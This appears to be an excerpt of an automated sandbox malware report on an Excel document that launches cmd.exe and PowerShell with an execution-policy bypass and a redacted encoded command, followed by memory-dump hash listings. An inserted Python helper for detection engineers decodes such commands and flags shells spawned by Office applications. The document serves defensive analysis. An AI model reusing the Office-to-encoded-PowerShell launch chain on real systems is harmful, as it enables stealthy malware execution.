Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:29:16
Start date: 26/08/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC 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'
Imagebase: 0x7ff622070000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:29:16
Start date: 26/08/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:29:17
Start date: 26/08/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -ExecutionPolicy BypasS -ENC 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
Imagebase: 0x7ff7bedd0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high
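
The process entries above are the part of this report a detection engineer reuses: a 32-bit EXCEL.EXE starts cmd.exe, which starts a 64-bit powershell.exe with `-ExecutionPolicy BypasS -ENC ...`. Two details matter for matching. The switch casing is mangled (`BypasS`, `-ENC`), so a case-sensitive signature misses it, and powershell.exe accepts any unambiguous prefix of `-EncodedCommand` (`-e`, `-ec`, `-enc`, ...), so a rule that only knows the full switch name also misses it. `-ExecutionPolicy Bypass` itself is not a privilege boundary crossing; it only unlocks script execution for that process, so it is a telemetry signal, not an exploit step. The Python below is an added triage helper, not code from the report or from Joe Sandbox: it decodes the base64/UTF-16LE payload, matches the switches case-insensitively by prefix, and walks the parent chain to flag a shell descended from an Office application. The event dictionaries, their field names, the PIDs of cmd.exe and powershell.exe and the encoded payload are constructed (the report redacts the real `-ENC` argument, and only EXCEL's PID 7044 is taken from it).

```python
import base64
import re

# powershell.exe matches switches by unambiguous prefix, so list every prefix of
# -EncodedCommand; -ExecutionPolicy prefixes (-ex, -exec, ...) are deliberately absent.
_ENC_SWITCH = (
    r"(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|"
    r"encodedcom|encodedcomm|encodedcomma|encodedcomman|encodedcommand)"
)
ENCODED_RE = re.compile(_ENC_SWITCH + r"\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# case-insensitive on purpose: the sample writes "BypasS"
EXECPOLICY_RE = re.compile(r"(?:^|\s)-ex[a-z]*\s+(bypass|unrestricted)\b", re.IGNORECASE)

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip("'\"").lower()


def decode_encoded_command(command_line: str):
    """Return the -EncodedCommand payload as text, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        # PowerShell expects base64 of UTF-16LE text, not UTF-8
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(events, pid, max_depth=4):
    """Images from the process itself up to its oldest known ancestor (constructed pid/ppid fields)."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid and len(chain) < max_depth:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def triage(events, event):
    """Findings for one process-creation event, in a fixed order."""
    findings = []
    chain = ancestry(events, event["pid"])
    if chain and chain[0] in SHELL_IMAGES and any(a in OFFICE_IMAGES for a in chain[1:]):
        findings.append("office-descendant-shell")
    cmd = event["command_line"]
    m = EXECPOLICY_RE.search(cmd)
    if m:
        findings.append("execution-policy-" + m.group(1).lower())
    if ENCODED_RE.search(cmd):
        findings.append("encoded-command")
        if decode_encoded_command(cmd) is None:
            findings.append("encoded-command-undecodable")
    return findings


# Constructed stand-in for the redacted payload; NOT the sample's real command.
PLACEHOLDER_PAYLOAD = "Write-Output 'constructed placeholder, not the sample payload'"
PLACEHOLDER_B64 = base64.b64encode(PLACEHOLDER_PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed events mirroring the report's chain; only PID 7044 and the switches are from the report.
SAMPLE_EVENTS = [
    {"pid": 7044, "ppid": 1, "image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "command_line": "'C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE' /automation -Embedding"},
    {"pid": 7100, "ppid": 7044, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": 'cmd.exe /c "powershell -ExecutionPolicy BypasS -ENC ' + PLACEHOLDER_B64 + '"'},
    {"pid": 7108, "ppid": 7100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -ExecutionPolicy BypasS -ENC " + PLACEHOLDER_B64},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["image"]), triage(SAMPLE_EVENTS, ev))
        decoded = decode_encoded_command(ev["command_line"])
        if decoded is not None:
            print("  decoded:", decoded)
```

The ancestry walk is what distinguishes this chain from an administrator running an encoded command by hand: powershell.exe's direct parent is cmd.exe, which is unremarkable, and only the grandparent EXCEL.EXE makes the event worth escalating. An undecodable `-ENC` argument is reported separately rather than ignored, since truncated or non-base64 payloads in telemetry are themselves worth a look.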

                                                                                                                                              Disassembly

                                                                                                                                              Code Analysis


                                                                                                                                                Executed Functions

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732539848.00007FFA36020000.00000040.00000001.sdmp, Offset: 00007FFA36020000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: N`_H$O`_H
                                                                                                                                                • API String ID: 0-3974233961
                                                                                                                                                • Opcode ID: 391d1747b077f69a32361e3fb84005b9b80230bd13eafde119c2ca2d980f47fc
                                                                                                                                                • Instruction ID: f209f303efaef84f8b607214c6aafbcdfcf480940c0c4df3df59286c813b44c1
                                                                                                                                                • Opcode Fuzzy Hash: 391d1747b077f69a32361e3fb84005b9b80230bd13eafde119c2ca2d980f47fc
                                                                                                                                                • Instruction Fuzzy Hash: 21C13861A0DB8A4FF796D76C98569747BE0EF6B310B0881BBD44CC7293ED19EC468341
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732539848.00007FFA36020000.00000040.00000001.sdmp, Offset: 00007FFA36020000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: K`_H
                                                                                                                                                • API String ID: 0-1621246777
                                                                                                                                                • Opcode ID: ebd908c7dfde34cdc4cb3d29110ffad0a0fb111b9ef3dedfad42a6bf555824f7
                                                                                                                                                • Instruction ID: 59fb91ed968bcd99e7ddb1169f754834bb36da3de90029d48575e8133cba2557
                                                                                                                                                • Opcode Fuzzy Hash: ebd908c7dfde34cdc4cb3d29110ffad0a0fb111b9ef3dedfad42a6bf555824f7
                                                                                                                                                • Instruction Fuzzy Hash: F452F631A1CA494FEB99DB1CD496AB97BE1FF5A310F1481BED04DC7292DE25E842C780
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732539848.00007FFA36020000.00000040.00000001.sdmp, Offset: 00007FFA36020000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: h~#6
                                                                                                                                                • API String ID: 0-4037715794
                                                                                                                                                • Opcode ID: 13bc7951bda59422e45264e65276b1b7f58ae2280864ecc9ed43aba9e1f594a3
                                                                                                                                                • Instruction ID: fe1c2cdddf5b0d863109844eb9f43ee5ea2455e5e877624a2247a84b0bb8c5ca
                                                                                                                                                • Opcode Fuzzy Hash: 13bc7951bda59422e45264e65276b1b7f58ae2280864ecc9ed43aba9e1f594a3
                                                                                                                                                • Instruction Fuzzy Hash: 29C14F31A08A4D8FEF95DF98D456EA977E1FF6A300F148169D40DD7296CE35E881CB80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732539848.00007FFA36020000.00000040.00000001.sdmp, Offset: 00007FFA36020000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4c2ac6696a3f2111a111cd6b70c3342ccb0133202f6591f4f06fedfd64ba94f3
                                                                                                                                                • Instruction ID: 486652f0f52a8d446000fb810f0eceea9c6aeb2787356e47cb53ed69f3c14670
                                                                                                                                                • Opcode Fuzzy Hash: 4c2ac6696a3f2111a111cd6b70c3342ccb0133202f6591f4f06fedfd64ba94f3
                                                                                                                                                • Instruction Fuzzy Hash: 4402B330A18A498FEB54EF5CD496AB977E1FF5A310F14817AD40DD7296CE25E882CB80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1eeae8e971c0a39f58beef5287f432d7972faa27574df710c97cdd2867fc39a3
                                                                                                                                                • Instruction ID: 7910068a4f0a957f4e0bff94cec16841bd15fe232bf966d1ecffd4fd9f5ccdcf
                                                                                                                                                • Opcode Fuzzy Hash: 1eeae8e971c0a39f58beef5287f432d7972faa27574df710c97cdd2867fc39a3
                                                                                                                                                • Instruction Fuzzy Hash: EF12E531A0DB894FF7A6D76888669757FE1EF5B210B0881FBD44DCB293DD1AAC098341
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 59e2eb8c0e2a557ff40a122be402b67f7e89c04baeb681c97e8e7270436193a7
                                                                                                                                                • Instruction ID: ca5897fdf998db413fb7684039ed882cf94694d5568573664b039ee7159a6732
                                                                                                                                                • Opcode Fuzzy Hash: 59e2eb8c0e2a557ff40a122be402b67f7e89c04baeb681c97e8e7270436193a7
                                                                                                                                                • Instruction Fuzzy Hash: 29D1326190D7CA4FF7A6D768581A9B47FE1EF1B210B0880FBD44DCB293DE1AA805D352
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a9d342530b14d3972761f7af1d125fdc9218afe3ccc887b98a6b4c52205522f6
                                                                                                                                                • Instruction ID: 692c8243fc197925e9a1e7f4f47c51ea5317e2d62877c3c3aa3b36e149a1961a
                                                                                                                                                • Opcode Fuzzy Hash: a9d342530b14d3972761f7af1d125fdc9218afe3ccc887b98a6b4c52205522f6
                                                                                                                                                • Instruction Fuzzy Hash: 0FC1352190DB894FF7A5D76848169B57BE1EF6B310B0881BFD84CCB293DE1AAC05C351
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 790d9850232f72a5f287946e62dc5a282ae0ee814e5198c90c9cfbac548af9bf
                                                                                                                                                • Instruction ID: 52308d2e2ecc023a99f811f3b35c956b1282c370959face63c6a92b55e9aa2da
                                                                                                                                                • Opcode Fuzzy Hash: 790d9850232f72a5f287946e62dc5a282ae0ee814e5198c90c9cfbac548af9bf
                                                                                                                                                • Instruction Fuzzy Hash: E1B1263190CA8A4FF7A5E76848965F57BE1EF5B310B0481BFE44DCB293DE1AAC158341
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a2115bfc4362b45ffeaa2cf6803f008f15368c2fc9832b18031f418a45af3ab8
                                                                                                                                                • Instruction ID: 946601c4faafc3c71897de96f9b31305f27909ae2c1aac298878ba42287a0b72
                                                                                                                                                • Opcode Fuzzy Hash: a2115bfc4362b45ffeaa2cf6803f008f15368c2fc9832b18031f418a45af3ab8
                                                                                                                                                • Instruction Fuzzy Hash: 34815931A1CB4D4FF7A5EB5898469B63BE1EF9B720B04817BE44DC7293ED15AC068380
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8700d270729c243671bc1a501314701eb1af62a2009be229e92333f02e8bf3b1
                                                                                                                                                • Instruction ID: 845da650750a48b8aa5f281902d0df2e7b50ed028fff183158faf75def960309
                                                                                                                                                • Opcode Fuzzy Hash: 8700d270729c243671bc1a501314701eb1af62a2009be229e92333f02e8bf3b1
                                                                                                                                                • Instruction Fuzzy Hash: E251C06194EBC54FF3A6D73858669707FE09F5B214B0981FBD08CCB2E3ED4998098352
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f0799a8eb15697f724da48b2f0550f31d981187b999e9ab87d1f95e0ba581d25
                                                                                                                                                • Instruction ID: de5667bcd41be9f01950d397305bfd08805a3a91f44869de0dd4b9b55da5e134
                                                                                                                                                • Opcode Fuzzy Hash: f0799a8eb15697f724da48b2f0550f31d981187b999e9ab87d1f95e0ba581d25
                                                                                                                                                • Instruction Fuzzy Hash: 7561C26290E7C54FE767977858225A57FE1DF5B220B1980FBD08DCB293DD0E980AC392
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 554d4ad5813d64b8884e1e0990eb8a1ab33c438d920e2a83eaaa6ea8e5701c5c
                                                                                                                                                • Instruction ID: e36ec8e8b699d49c2d890186ea9401fc5b9913012da9a2c5918810c9680536b3
                                                                                                                                                • Opcode Fuzzy Hash: 554d4ad5813d64b8884e1e0990eb8a1ab33c438d920e2a83eaaa6ea8e5701c5c
                                                                                                                                                • Instruction Fuzzy Hash: FB51D12290DB864FF7A5D76848669787BD1EF6B310B08C0BEC80DCB2D3DD1AAC459351
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d7a3e214f79eb559d2acad6bf3eb6ca4e2983512653a0937df276a64c265766f
                                                                                                                                                • Instruction ID: 22f62367930f9a1ec1ef3c8a726d20eb3695c82ddcbc2949eb738003be868743
                                                                                                                                                • Opcode Fuzzy Hash: d7a3e214f79eb559d2acad6bf3eb6ca4e2983512653a0937df276a64c265766f
                                                                                                                                                • Instruction Fuzzy Hash: A151C16190DB864FF7AAD768585A5787FD1AF1B700B18D0FAD04DCB2D3DE0AAC449342
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 86df692d443d7a1ff2bf1361b35598aaf952222c7b3bb7241ecc7f6ff78faaa1
                                                                                                                                                • Instruction ID: 321bedfdb3df71fdcae7575984b3c6d8452af9ccb7b90f621fa4cea9fcbd58d4
                                                                                                                                                • Opcode Fuzzy Hash: 86df692d443d7a1ff2bf1361b35598aaf952222c7b3bb7241ecc7f6ff78faaa1
                                                                                                                                                • Instruction Fuzzy Hash: 7951D262A0DA864FF7A5D76848A65B87BE1AF1B310B08C0FED04DCF2D7DD1AAC159341
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732539848.00007FFA36020000.00000040.00000001.sdmp, Offset: 00007FFA36020000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c21a126d46759df168e0323f0a4fea2420e48532d7ea4bd8bd785e724db08a89
                                                                                                                                                • Instruction ID: 16a78db9ce586f53d398b5c70c390babf39442a6f493dc3e27095e73475a3cf8
                                                                                                                                                • Opcode Fuzzy Hash: c21a126d46759df168e0323f0a4fea2420e48532d7ea4bd8bd785e724db08a89
                                                                                                                                                • Instruction Fuzzy Hash: 4D51093190CB894FE354DB18D856AA5BBE1FF97310F48C6BAE04DC7292CE29D945C781
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2a5cfec8784a1aca933ea65c0f40bac0901cea35db50b056d76c1c10981791ed
                                                                                                                                                • Instruction ID: 8a6f25c392868e9c34b7c7cd66924b6412d12e7684c1c297cc8945bff1b2445a
                                                                                                                                                • Opcode Fuzzy Hash: 2a5cfec8784a1aca933ea65c0f40bac0901cea35db50b056d76c1c10981791ed
                                                                                                                                                • Instruction Fuzzy Hash: F241F432E1CB498FF7A6DB9C6446A7577D1EFAB710B09C17AD40DCB292DD15AC068380
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732539848.00007FFA36020000.00000040.00000001.sdmp, Offset: 00007FFA36020000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 613d81c6d8518a63d0c5a5c0934a375859bcc8339a55a5bad654d544a0c6ec6e
                                                                                                                                                • Instruction ID: cee6e7cf066a1847dab6544a6566882904149a9fae36516378d6a298505b9e60
                                                                                                                                                • Opcode Fuzzy Hash: 613d81c6d8518a63d0c5a5c0934a375859bcc8339a55a5bad654d544a0c6ec6e
                                                                                                                                                • Instruction Fuzzy Hash: 77313471A0DA494FE74AD75CA8569747BE0EF67320B1481BED04DCB293DC1ABC838386
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732712941.00007FFA360F0000.00000040.00000001.sdmp, Offset: 00007FFA360F0000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: cfdbfb0c2f87b1f8d9cad6f3cec52c3dce090c078e22ed68afa62f4a93aed5ee
                                                                                                                                                • Instruction ID: 25c393da8ae30ad9d4b79d103a7f8064dd41674987056122a87a21520e6311f3
                                                                                                                                                • Opcode Fuzzy Hash: cfdbfb0c2f87b1f8d9cad6f3cec52c3dce090c078e22ed68afa62f4a93aed5ee
                                                                                                                                                • Instruction Fuzzy Hash: F131E56190CB458BF7A9D76844569B57BD1EF9B720B18D07EE04DCB292CD1A9C4683C0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.732539848.00007FFA36020000.00000040.00000001.sdmp, Offset: 00007FFA36020000, based on PE: false
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3da87bd7798952b4a2976be7c7c480140c776912b12a36151027e3b3caf38d97
                                                                                                                                                • Instruction ID: 43d810a60fb5ca15e87c8678364142a79e1b03e26d8daa3fa9671f13f7633a36
                                                                                                                                                • Opcode Fuzzy Hash: 3da87bd7798952b4a2976be7c7c480140c776912b12a36151027e3b3caf38d97
                                                                                                                                                • Instruction Fuzzy Hash: 6901677111CB0C8FD744EF0CE451AB6B7E0FB95324F10456DE58AC7695DA36E882CB45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.732539848.00007FFA36020000.00000040.00000001.sdmp, Offset: 00007FFA36020000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Strings
Memory Dump Source
• Source File: 00000006.00000002.732539848.00007FFA36020000.00000040.00000001.sdmp, Offset: 00007FFA36020000, based on PE: false
Similarity
• API ID:
• String ID: 3^_^$4^_^
• API String ID: 0-3470401908
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.732539848.00007FFA36020000.00000040.00000001.sdmp, Offset: 00007FFA36020000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%